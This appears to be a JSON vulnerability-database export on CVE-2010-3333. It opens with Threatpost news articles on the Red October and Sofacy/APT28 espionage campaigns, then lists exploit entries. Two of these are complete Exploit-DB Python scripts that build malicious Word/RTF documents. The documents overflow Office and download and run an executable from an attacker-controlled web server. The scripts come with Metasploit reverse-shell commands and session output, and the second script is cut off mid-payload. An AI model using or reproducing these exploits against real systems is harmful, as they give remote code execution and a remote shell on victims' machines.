Western Europe and North America, Kaspersky said.\n\n\u201cThe campaign is currently still active with data being sent to multiple command-and-control servers through an infrastructure which rivals the complexity of the Flame malware,\u201d Kaspersky said in a [report released today](<http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies>).\n\nKaspersky said it was alerted of the Rocra attacks by a partner last October when it began its analysis of the campaign. Several hundred infections worldwide have been counted. Three exploits have been used in the attack, all of which Kaspersky said were developed in China; the malware modules dropped in the attacks were created by Russian-speaking operatives, Kaspersky concluded.\n\n\u201cCurrently, there is no evidence linking this with a nation-state sponsored attack. The information stolen by the attackers is obviously of the highest level and includes geopolitical data which can be used by nation states,\u201d the report said. \u201cSuch information could be traded in the underground and sold to the highest bidder, which can be of course, anywhere.\u201d\n\nLike most of these APT-style targeted attacks, this one begins with a spear phishing message; one example provided was an announcement of a diplomatic car for sale.The email messages contain one of three attachments, each a different exploit of an existing vulnerability. One targets [CVE-2009-3120](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3120>) using a malicious Microsoft Excel document, while the other two are Word docs exploiting [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>) or [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). These exploits were used in previous attacks against Tibetan activists and military and energy targets in Asia; for Rocra, the attackers not only reused the exploits, but replaced the payload with their own malware.\n\nThe documents are tailored for specific victims and the malware modules have specific victim ID numbers, Kaspersky said. Rocra operates on a personal level with the victim; the level of interaction is high and driven by the victim\u2019s system configuration, the types of documents on their machine, software installed, native language and more.\n\nOnce the victim opens the malicious document, a Trojan is dropped on the machine which drops a module that scans the local network for other hosts vulnerable to [MS08-067](<http://technet.microsoft.com/en-us/security/bulletin/ms08-067>), the same vulnerability exploited by the Conficker worm, Kaspersky said. It also looks to access other hosts using credentials from its own password database. Another module tries to infect remote hosts on the same network. Kaspersky said the malware authors have Russian-speaking origins, and researchers had not seen the malicious executables before; one, for example, would change the default system codepage to 1251, which is required to render Cyrillic fonts, Kaspersky\u2019s report said.\n\nThe campaign targets not only Office documents, email and a long list of document types including the acid* extension, which Kaspersky said refers to the classified Acid Cryptofiler software used by the European Union and NATO.\n\n[](<http://www.securelist.com/en/images/pictures/klblog/208194085.png>)\n\n\u201cThe main purpose of the operation appears to be the gathering of classified information and geopolitical intelligence, although it seems that the information gathering scope is quite wide,\u201d the report said. \u201cDuring the past five years, the attackers collected information from hundreds of high profile victims although it\u2019s unknown how the information was used. It is possible that the information was sold on the black market, or used directly.\u201d\n\nThe command and control infrastructure behind this campaign is made up of 60 domains and a number of server host locations in Russia and Germany, most of which act as proxies in order to hide the true C&C server. Kaspersky said it was able to sinkhole six of the domains and watch them over since Nov. 2. More than 55,000 connections were made to the sinkhole from close to 250 IP addresses. Most of those IP addresses were in Switzerland, Kazakstan, Greece and Belarus; there are victims in 39 countries.\n\nKaspersky said it has not found any connections between Rocra and [Flame](<https://threatpost.com/flame-attackers-used-collision-attack-forge-microsoft-certificate-060512/>), yet did say the campaign was more sophisticated than the [Aurora attacks on Google](<https://threatpost.com/inside-aurora-google-attack-malware-011910/>) or Night Dragon; its researchers found more than 1,000 unique malware files among 30 different categories, including reconnaisance, credential harvesting, email and USB specific, propagation, mobile devices and data exfiltration.\n\nSome of the modules are one-time tasks, while others must remain persistent. Examples of persistent tasks include: search and extract files from a USB drive; wait for a mobile phone to connect and if it\u2019s an iPhone or Nokia, steal its contents, or if a Windows phone, install a mobile version of Rocra; record keystrokes and screenshots; and more. Examples of one-time tasks include: collection of system, network and software information; extract browsing history, saved passwords, Windows account hashes and Outlook account information; write and execute arbitrary code; scan for administrative credentials; scan for Cisco network devices; and more.\n\nMassive amounts of data were lost, the researchers said.\n\n\u201cWith Rocra, the attackers managed to stay in the game for over 5 years and evade detection of most antivirus products while continuing to exfiltrate what must be hundreds of Terabytes by now,\u201d Kaspersky said.\n", "modified": "2013-05-10T14:24:31", "published": "2013-01-14T13:00:00", "id": "THREATPOST:551363592C0C853E266999644B3579E4", "href": "https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/77397/", "type": "threatpost", "title": "Rocra Espionage Malware Campaign Uncovered After Five Years of Activity", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:33", "bulletinFamily": "info", "cvelist": ["CVE-2009-3120", "CVE-2009-3129", "CVE-2010-3333", "CVE-2012-0158"], "description": "The [Red October espionage malware campaign](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>) is providing security researchers with a deep dive into the complexity of targeted attacks, which in this case made use of more than 1,000 malware modules for everything from reconnaissance on targets to exfiltration of data to command and control servers.\n\nThe moving parts behind Red October are vast and have been under wraps for the better part of five years, [Kaspersky Lab researchers revealed this week](<http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies>). The attackers behind this campaign targeted victims in 39 countries, primarily diplomats, researchers and military facilities among other institutions since August 2007. They stole reams of data and used exploits for known Microsoft vulnerabilities, constantly uploading their loot to a network of 60 command and control servers\u2014a number that rivals the 90-plus domains used by the Flame cyberespionage campaign.\n\nKaspersky was able to sinkhole a half dozen of those domains and watch over a two-month period 250 unique IP addresses connect more than 55,000 times. What they found was a fascinating mix of tasks mandated by the attackers, some of which remained persistent on compromised machines, while others were one-time operations. Most noteworthy is that attacks were tailored for particular victims, each with a unique identifier that enables the attacker to cobble together a complete picture of the victim\u2019s system configuration, browsing habits and more and manage each attack individually if need be.\n\n\u201cThis campaign is extraordinary in terms of the amount of effort that was invested to tailor the attack toolset for victims\u2019 environments,\u201d said senior security researcher Kurt Baumgartner.\n\nMost of the tasks assigned by the attacker via backdoors installed during initial infection are one-time operations delivered by a portable executable (PE) DLL that are executed in memory and discarded, Kaspersky said today in an [expanded report on the campaign](<http://www.securelist.com/en/blog/208194091/Red_October_part_two_the_modules>).\n\nOther tasks require a persistent presence on a machine and are delivered as PE EXE files. The attackers are using these persistent tasks to continually log keystrokes, record screenshots, retrieve email messages from Outlook or execute malicious payloads embedded in any of the Office-document exploits used to establish backdoor communication with the C&C servers.\n\nUnique among the persistent modules are those that are related to USB drives and mobile devices.\n\nFor example, one module will search and extract files and deleted files from a USB drive once it is connected to a compromised machine. Deleted files are restored and exfiltrated. Another module waits for an iPhone or Nokia smartphone to connect to the machine, then grabs device information, including contact information, call history, SMS messages, calendars and more. There is also a Windows Mobile module, which once one of those devices connects, infects the phone with a mobile version of the malware.\n\nThe campaign also targets documents with the acid* extension, which Kaspersky said refers to the classified Acid Cryptofiler software used by the European Union and NATO.\n\n\u201cThere is an incredible amount of functionality here that is new,\u201d Baumgartner said. \u201cIt\u2019s unusual to see it all in one campaign.\u201d\n\nSome of the one-time tasks include: collecting device hardware and software specs; filesystem and network share information; collecting information on installed software, including Oracle Database, messaging software and drivers and software for mobile devices and USB drives; extraction of browsing history from all leading browsers, saved passwords for websites, mail and IM accounts, Windows account hashes, and Outlook account information. Others include the ability to download files from FTP servers reachable from the infected machine, writing and executing code from the attacker, doing network scans and dumping configuration data from Cisco devices, and doing a network scan for other computers on the network vulnerable to the same exploit used by [Conficker (MS08-067)](<http://technet.microsoft.com/en-us/security/bulletin/ms08-067>).\n\nIn all there are nine module groups discovered in this campaign: reconnaissance; password or credential harvesting; email; USB drive; keyboard; persistence; propagation; mobile; and data exfiltration.\n\nKaspersky was alerted to the Red October campaign by a partner reporting a spear phishing campaign. Four exploits have been used in the attack, on targeting [CVE-2009-3129](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3129>) using a malicious Microsoft Excel document, two others are Word docs exploiting [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>) or [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). The fourth is a Java exploit discovered by researchers at Seculert. All of the Office exploits were used in previous attacks against Tibetan activists and military and energy targets in Asia, Kaspersky said.\n\nMost of the 60 C&C domains are in Russia and Germany while the victims are worldwide with most of the IP addresses connecting from Switzerland, Kazakhstan, Greece and Belarus. The attacks have not been attributed as of yet. A heat map of the attacks showed victims across the globe, but none in China leading to speculation the Chinese could be behind the campaign. But Kaspersky researcher Costin Raiu cautioned today on the [Digital Underground podcast](<https://threatpost.com/costin-raiu-red-october-cyberespionage-campaign-011713/>) that because the company was able to sinkhole only six domains, they may not be seeing the complete infection picture.\n\nThe campaign, meanwhile, may be shutting down, Raiu said, adding that the infrastructure is being taken off line with registrars killing the 60 domains and hosting companies killing the C&C servers.\n", "modified": "2013-05-10T14:15:16", "published": "2013-01-17T19:20:06", "id": "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "href": "https://threatpost.com/inside-1000-red-october-cyberespionage-malware-modules-011713/77419/", "type": "threatpost", "title": "Inside the 1,000 Red October Cyberespionage Malware Modules", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:59", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333", "CVE-2011-2140", "CVE-2012-0158", "CVE-2012-1856", "CVE-2014-6352", "CVE-2015-2375", "CVE-2015-2376", "CVE-2015-2377", "CVE-2015-2424", "CVE-2015-5119"], "description": "A new analysis of the Sofacy APT gang, a Russian-speaking group carrying out targeted attacks against military and government offices for close to a decade, shows a relentless wave of intrusions peaking this summer against victims in a number of NATO countries and the Ukraine.\n\nResearchers at Kaspersky Lab this morning [released their update on Sofacy](<https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/>), which is also known as APT28, Fancy Bear, Sednit and a handful of other monikers. The report demonstrates a barrage of zero-day vulnerabilities in Office, Java, Adobe and Windows at the group\u2019s disposal; the zero-days are being used against targets in attacks that remained active as of last month. The gang\u2019s malware implants were uncovered as well as its capabilities to quickly adapt to detection technologies and hit compromised machines with different backdoors so that in case one was found out, there would be fallbacks.\n\nSofacy\u2019s roots go back to around 2007, Kaspersky researchers said, with the name coming from an implant used in attacks four years ago that shared some similarities with the [Miniduke APT](<https://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569/>) gang uncovered by Kaspersky Lab in 2013 executing espionage activity against governments in Europe.\n\nSofacy\u2019s rapid capability expansion began in 2013 when a number of new backdoors and malware tools were discovered, including CORESHELL, JHUHUGIT and AZZY among others.\n\nThis summer, the AZZY implant got a facelift and was used as recently as October along with a new USB-stealing malware designed to hit air-gapped machines.\n\nIn July, researchers at iSight Partners reported that Sofacy, or Tsar Team as iSight calls them, had dropped their [sixth zero day exploit in four months](<https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/>), two of which in Office and Java were patched during a span of a few days in July.\n\n\u201cUsually, when someone publishes research on a given cyber-espionage group, the group reacts: either it halts its activity or dramatically changes tactics and strategy. With Sofacy, this is not always the case. We have seen it launching attacks for several years now, and its activity has been reported by the security community multiple times,\u201d said Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab.\n\nFive of the six zero days, iSight said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach. Given the underground value of unpatched and unreported vulnerabilities, this was highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nKaspersky researchers said that it discovered the group was using a Flash and Java zero day to drop the JHUHUGIT malware implant, which became its most prevalent first-stage implant in subsequent attacks.\n\nThe updated AZZY Trojan, meanwhile, surfaced in August in attacks against higher profile victims, and including in one case, a defense contractor, Kaspersky researchers said. While the first sample was spotted on July 29 and signatures quickly added to security systems, Kaspersky researchers said that by Aug. 4, another sample was in the wild. What made the AZZY update stand out was that it was not delivered via a zero-day, instead it was delivered and installed by separate malware already on the system, a dropper called msdeltemp.dll that the attackers controlled via backdoors in order to send commands to infected machines.\n\n\u201cThis code modification marks an unusual departure from the typical AZZY backdoors, with its C&C communication functions moved to an external DLL file,\u201d Kaspersky researchers wrote in their report. \u201cIn the past, the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry, instead of storing it in the malware itself, so this code modularization follows the same line of thinking.\u201d\n\nIn addition to traditional data-stealing capabilities, Sofacy also covets information stored on air-gapped machines and uses its USBSTEALER implant to drain these machines of valuable content.\n\nThis is behavior similar to that of the Equation group, one of the most sophisticated state-sponsored groups, which invested significant resources in developing more than 100 malware implants, each with their own purpose and used selectively against valuable targets.\n\n\u201cIn 2015 its activity increased significantly, deploying no less than five 0-days, making Sofacy one of the most prolific, agile and dynamic threat actors in the arena,\u201d Raiu said. \u201cWe have reasons to believe that these attacks will continue.\u201d\n", "modified": "2015-12-04T21:35:34", "published": "2015-12-04T07:05:37", "id": "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "href": "https://threatpost.com/relentless-sofacy-apt-attacks-armed-with-zero-days-new-backdoors/115556/", "type": "threatpost", "title": "Sofacy APT28 Gang Using New Backdoors, Zero Days", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-01T09:17:23", "description": "Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka \"RTF Stack Buffer Overflow Vulnerability.\"\r Output .doc\r Url download and execute\r CVE2010-3333\r MS10-087\r Detected output\r PoC : https://www.youtube.com/watch?v=crTxxigt0u0&list=UUkv21RQpnb8Cfhj0ExhV61Q&feature=c4-overview#### Usage Info\nPoC : https://www.youtube.com/watch?v=crTxxigt0u0&list=UUkv21RQpnb8Cfhj0ExhV61Q&feature=c4-overview\n\nThis is private exploit. You can buy it at https://0day.today", "edition": 2, "published": "2014-01-30T00:00:00", "type": "zdt", "title": "Office 2003 SP3, Office 2007 SP2, Office 2011 Stack-based buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2014-01-30T00:00:00", "id": "1337DAY-ID-21830", "href": "https://0day.today/exploit/description/21830", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2016-02-02T09:32:25", "description": "Microsoft Office 2003 Home/Pro - Code Execution (0day). CVE-2010-3333. Local exploit for windows platform", "published": "2012-01-08T00:00:00", "type": "exploitdb", "title": "Microsoft Office 2003 Home/Pro - Code Execution 0day", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2012-01-08T00:00:00", "id": "EDB-ID:18334", "href": "https://www.exploit-db.com/exploits/18334/", "sourceData": "#!/usr/bin/python\r\n\r\n#\r\n# Note from the Exploit-DB team: This might be the same bug as:\r\n# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb\r\n#\r\n\r\n#-----------------------------------------------------------------------------------#\r\n# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #\r\n# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #\r\n#####################################################################################\r\n# One shellcode to rule them all, One shellcode to find them, One shellcode to #\r\n# bring them all and in the darkness bind them!! #\r\n# #\r\n# Greetings: offsec, corelan, setoolkit #\r\n#####################################################################################\r\n# (1) root@bt:~/Desktop/office# ./office2003.py #\r\n# root@bt:~/Desktop/office# mv evil.doc /var/www/ #\r\n# #\r\n# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #\r\n# > /var/www/magic.exe #\r\n# #\r\n# (3) msf exploit(handler) > exploit #\r\n# #\r\n# [*] Started reverse handler on 192.168.111.132:9988 #\r\n# [*] Starting the payload handler... #\r\n# [*] Sending stage (752128 bytes) to 192.168.111.128 #\r\n# [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#\r\n# at 2012-01-08 18:46:26 +0800 #\r\n# #\r\n# meterpreter > ipconfig #\r\n# #\r\n# MS TCP Loopback interface #\r\n# Hardware MAC: 00:00:00:00:00:00 #\r\n# IP Address : 127.0.0.1 #\r\n# Netmask : 255.0.0.0 #\r\n# #\r\n# AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport #\r\n# Hardware MAC: 00:0c:29:6c:92:42 #\r\n# IP Address : 192.168.111.128 #\r\n# Netmask : 255.255.255.0 #\r\n#-----------------------------------------------------------------------------------#\r\n\r\nimport binascii\r\n\r\nfilename = \"evil.doc\"\r\n\r\n#-----------------------------------------------------------------------------------#\r\n# File Structure #\r\n#-----------------------------------------------------------------------------------#\r\nfile = (\r\n\"{\\\\rt##{\\shp{\\sp}}{\\shp{\\sp}}{\\shp{\\sp}}{\\shp{\\*\\shpinst\\shpfhdr0\\shpbxcolumn\\s\"\r\n\"hpbypara\\sh pwr2}{\\sp{\\sn {}{}{\\sn}{\\sn}{\\*\\*}pFragments}{\\*\\*\\*}{\\sv{\\*\\*\\*\\*\\*\"\r\n\"\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*}9;2;ffffffffff\")\r\n\r\n#-----------------------------------------------------------------------------------#\r\n# Open raw socket to download payload to parent directory as \"a.exe\" #\r\n# ==> cmd execute \"a.exe\" #\r\n#-----------------------------------------------------------------------------------#\r\nmagic = (\r\n\"\\x65\\x62\\x37\\x37\\x33\\x31\\x63\\x39\\x36\\x34\\x38\\x62\\x37\\x31\\x33\\x30\"\r\n\"\\x38\\x62\\x37\\x36\\x30\\x63\\x38\\x62\\x37\\x36\\x31\\x63\\x38\\x62\\x35\\x65\"\r\n\"\\x30\\x38\\x38\\x62\\x37\\x65\\x32\\x30\\x38\\x62\\x33\\x36\\x36\\x36\\x33\\x39\"\r\n\"\\x34\\x66\\x31\\x38\\x37\\x35\\x66\\x32\\x63\\x33\\x36\\x30\\x38\\x62\\x36\\x63\"\r\n\"\\x32\\x34\\x32\\x34\\x38\\x62\\x34\\x35\\x33\\x63\\x38\\x62\\x35\\x34\\x30\\x35\"\r\n\"\\x37\\x38\\x30\\x31\\x65\\x61\\x38\\x62\\x34\\x61\\x31\\x38\\x38\\x62\\x35\\x61\"\r\n\"\\x32\\x30\\x30\\x31\\x65\\x62\\x65\\x33\\x33\\x34\\x34\\x39\\x38\\x62\\x33\\x34\"\r\n\"\\x38\\x62\\x30\\x31\\x65\\x65\\x33\\x31\\x66\\x66\\x33\\x31\\x63\\x30\\x66\\x63\"\r\n\"\\x61\\x63\\x38\\x34\\x63\\x30\\x37\\x34\\x30\\x37\\x63\\x31\\x63\\x66\\x30\\x64\"\r\n\"\\x30\\x31\\x63\\x37\\x65\\x62\\x66\\x34\\x33\\x62\\x37\\x63\\x32\\x34\\x32\\x38\"\r\n\"\\x37\\x35\\x65\\x31\\x38\\x62\\x35\\x61\\x32\\x34\\x30\\x31\\x65\\x62\\x36\\x36\"\r\n\"\\x38\\x62\\x30\\x63\\x34\\x62\\x38\\x62\\x35\\x61\\x31\\x63\\x30\\x31\\x65\\x62\"\r\n\"\\x38\\x62\\x30\\x34\\x38\\x62\\x30\\x31\\x65\\x38\\x38\\x39\\x34\\x34\\x32\\x34\"\r\n\"\\x31\\x63\\x36\\x31\\x63\\x33\\x65\\x38\\x39\\x32\\x66\\x66\\x66\\x66\\x66\\x66\"\r\n\"\\x35\\x66\\x38\\x31\\x65\\x66\\x39\\x38\\x66\\x66\\x66\\x66\\x66\\x66\\x65\\x62\"\r\n\"\\x30\\x35\\x65\\x38\\x65\\x64\\x66\\x66\\x66\\x66\\x66\\x66\\x36\\x38\\x38\\x65\"\r\n\"\\x34\\x65\\x30\\x65\\x65\\x63\\x35\\x33\\x65\\x38\\x39\\x34\\x66\\x66\\x66\\x66\"\r\n\"\\x66\\x66\\x33\\x31\\x63\\x39\\x36\\x36\\x62\\x39\\x36\\x66\\x36\\x65\\x35\\x31\"\r\n\"\\x36\\x38\\x37\\x35\\x37\\x32\\x36\\x63\\x36\\x64\\x35\\x34\\x66\\x66\\x64\\x30\"\r\n\"\\x36\\x38\\x33\\x36\\x31\\x61\\x32\\x66\\x37\\x30\\x35\\x30\\x65\\x38\\x37\\x61\"\r\n\"\\x66\\x66\\x66\\x66\\x66\\x66\\x33\\x31\\x63\\x39\\x35\\x31\\x35\\x31\\x38\\x64\"\r\n\"\\x33\\x37\\x38\\x31\\x63\\x36\\x65\\x65\\x66\\x66\\x66\\x66\\x66\\x66\\x38\\x64\"\r\n\"\\x35\\x36\\x30\\x63\\x35\\x32\\x35\\x37\\x35\\x31\\x66\\x66\\x64\\x30\\x36\\x38\"\r\n\"\\x39\\x38\\x66\\x65\\x38\\x61\\x30\\x65\\x35\\x33\\x65\\x38\\x35\\x62\\x66\\x66\"\r\n\"\\x66\\x66\\x66\\x66\\x34\\x31\\x35\\x31\\x35\\x36\\x66\\x66\\x64\\x30\\x36\\x38\"\r\n\"\\x37\\x65\\x64\\x38\\x65\\x32\\x37\\x33\\x35\\x33\\x65\\x38\\x34\\x62\\x66\\x66\"\r\n\"\\x66\\x66\\x66\\x66\\x66\\x66\\x64\\x30\\x36\\x33\\x36\\x64\\x36\\x34\\x32\\x65\"\r\n\"\\x36\\x35\\x37\\x38\\x36\\x35\\x32\\x30\\x32\\x66\\x36\\x33\\x32\\x30\\x32\\x30\"\r\n\"\\x36\\x31\\x32\\x65\\x36\\x35\\x37\\x38\\x36\\x35\\x30\\x30\")\r\n\r\n#------------------------------------------------------------------------------------------------------------------------------#\r\n# Two versions of office 2003 floating around: #\r\n# (1) Standalone version, (2) XP Service Pack upgrade #\r\n################################################################################################################################\r\n# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... #\r\n# #\r\n# (1) 0x30324366 - CALL ESP - WINWORD.exe => \"\\x36\\x36\\x34\\x33\\x33\\x32\\x33\\x30\" #\r\n# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe #\r\n# #\r\n# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => \"\\x35\\x35\\x32\\x36\\x34\\x30\\x33\\x30\" #\r\n# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #\r\n#------------------------------------------------------------------------------------------------------------------------------#\r\n\r\nEIP = \"\\x36\\x36\\x34\\x33\\x33\\x32\\x33\\x30\" #should ascii convert the Little Endian pointer\r\n\r\nfiller = \"\\x30\\x30\\x30\\x30\\x38\\x30\\x37\\x63\"*2 + \"\\x41\"*24 + \"\\x39\\x30\"*18\r\n\r\nbuffer = \"\\x23\"*501 + \"\\x30\\x35\" + \"\\x30\"*40 + EIP + filler + magic\r\n\r\n#-----------------------------------------------------------------------------------#\r\n# Since we are downloading our payload from a remote webserver there are no #\r\n# restrictions on payload size or badcharacters... #\r\n#-----------------------------------------------------------------------------------#\r\n\r\nURL = \"http://192.168.111.132/magic.exe\"\r\nbinnu = binascii.b2a_hex(URL)\r\n\r\nURL2 = \"00\"\r\nnxt=\"{}}}}}}\"\r\nnxt+=\"\\x0d\\x0a\"\r\nnxt+=\"}\"\r\n\r\ntextfile = open(filename , 'w')\r\ntextfile.write(file+buffer+binnu+URL2+nxt)\r\ntextfile.close()", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18334/"}, {"lastseen": "2016-02-02T23:28:25", "description": "Microsoft Office 2010 Download Execute. CVE-2010-3333. Remote exploit for windows platform", "published": "2013-02-20T00:00:00", "type": "exploitdb", "title": "Microsoft Office 2010 Download Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2013-02-20T00:00:00", "id": "EDB-ID:24526", "href": "https://www.exploit-db.com/exploits/24526/", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: MS Office 2010 Download Execute\r\n# Google Dork: NA\r\n# Date: 19 Feb 2013\r\n# Exploit Author: g11tch\r\n# Vendor Homepage:\r\n# Software Link:\r\n# Version: ALL \r\n# Tested on: [Windows XP SP1, SP2, Windows 7 ]\r\n# CVE :\r\n##########\r\n#Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe\r\n\r\nimport binascii\r\nimport sys\r\nimport time\r\n\r\nprint \"Microsoft Office 2010, download -N- execute \"\r\nprint \" What do you want to name your .doc ? \"\r\nprint \" Example: TotallyTrusted.doc \"\r\nfilename = raw_input()\r\n\r\nprint \" What is the link to your .exe ? \"\r\nprint \"HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe \"\r\n\r\nurl = raw_input()\r\n\r\nprint \"Gears and Cranks working mag1c in the background \"\r\ntime.sleep(3)\r\nclose=\"{}}}}}\"\r\nbinme=binascii.b2a_hex(url)\r\nfile=('e1xydGYxbnNpbnNpY3BnMTI1MlxkZWZmMFxkZWZsYW5nMTAzM3sNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb250dGJsew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN3aXNzDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGFyc2V0MCBBcmlhbDt9fXtcKlxnZW5lcmF0b3IgTXNmdGVkaXQgNS40MS4xNS4xNTA3O30NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlld2tpbmQ0XHVjMVxwYXJkDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHMyMCBwYXJkXGYwXGZzXHBhci90YWJccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhclxwYXJ7XHNocHtcc3B9fXtcc2hwe1xzcH19e1xzaHB7XHNwfX17XHNocHtcKlxzaHBpbnN0XHNocGZoZHIwXHNocGJ4Y29sdW1uXHNocGJ5cGFyYVxzaCBwd3IyfXtcc3B7XHNue317fXtcc259e1xzbn17XCpcKn1wRnJhZ21lbnRzfXtcKlwqXCp9e1wqXCpcc3Z7XCp9OTsyO2ZmZmZmZmZmZmYjMDUwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwZTBiOTJjM2ZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBNWMxMTEwM2ZhNTljMzgzZmNmYWYzOTNmMTAwMTA0MDEwMTAxMDEwMTAxMDEwMTAxZTBiOTJjM2YwMDgwMDAwMDQ2Y2IzOTNmZGVhZGJlZWZlMGI5MmMzZmMwM2QzYjNmY2MzMzIyM2ZkZjU5MmQzZmM0M2QzYjNmY2MxODJmM2ZjNDNkM2IzZjVlNzQyYjNmNWU3OTM5M2YyNDAwMDAwMDQ0Y2IzOTNmc2x1dGZ1Y2s2NzgyMzkzZmRlMTYzYTNmNjc4MjM5M2ZlMGI5MmMzZmMwM2QzYjNmYTU5YzM4M2Y3YzBhMmIzZmUwYjkyYzNmNTU2Njc3ODhjMDNkM2IzZmE1OWMzODNmZmJiZTM4M2ZlMGI5MmMzZjgwMDAwMDAwYjQ0MTM0M2Y1NTU1NTU1NTY2NjY2NjY2Y2ZhZjM5M2Y0MTQxNDE0MTQxNDE0MTQxNDE0MTQxN